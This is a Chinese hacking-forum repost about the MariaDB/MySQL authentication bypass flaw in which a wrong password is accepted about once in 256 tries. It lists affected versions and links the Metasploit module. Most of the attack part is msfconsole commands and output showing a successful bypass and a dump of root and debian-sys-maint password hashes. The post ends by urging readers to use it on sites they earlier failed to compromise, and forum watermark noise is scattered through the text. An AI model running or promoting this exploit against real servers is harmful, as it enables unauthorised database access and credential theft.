TA的每日心情 | 无聊 2020-8-3 22:39 |
---|
签到天数: 84 天 [LV.6]常住居民II
|
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空,同时也希望更多的技术爱好者加入我们。9 \ K9 ?' A. h: ?$ T" n u! P1 W
受影响的产品:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are90sec9 c1 i1 ~' D1 N9 s2 i, g! B
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.www.90sec.org G1 |. B' U# ?4 r, |# c1 r
- 专注信息安全( f' h0 F- O) Z+ C2 I
网上已经出了metasploit版本的相应利用工具,下载地址:
http://github.com/rapid7/metasp ... hbypass_hashdump.rb
利用方法如下:
- $ msfconsole
- msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
- msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
- msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
- msf auxiliary(mysql_authbypass_hashdump) > run
- [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
- [*] 127.0.0.1:3306 Authentication bypass is 10% complete
- [*] 127.0.0.1:3306 Authentication bypass is 20% complete
- [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
- [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
- [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
- [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
- [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
- [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
- [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
- [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
复制代码 赶快试试吧,说不定以前没日下来的站,这次就日下来了,嘿嘿,刚看到的,就转载过来了
|
|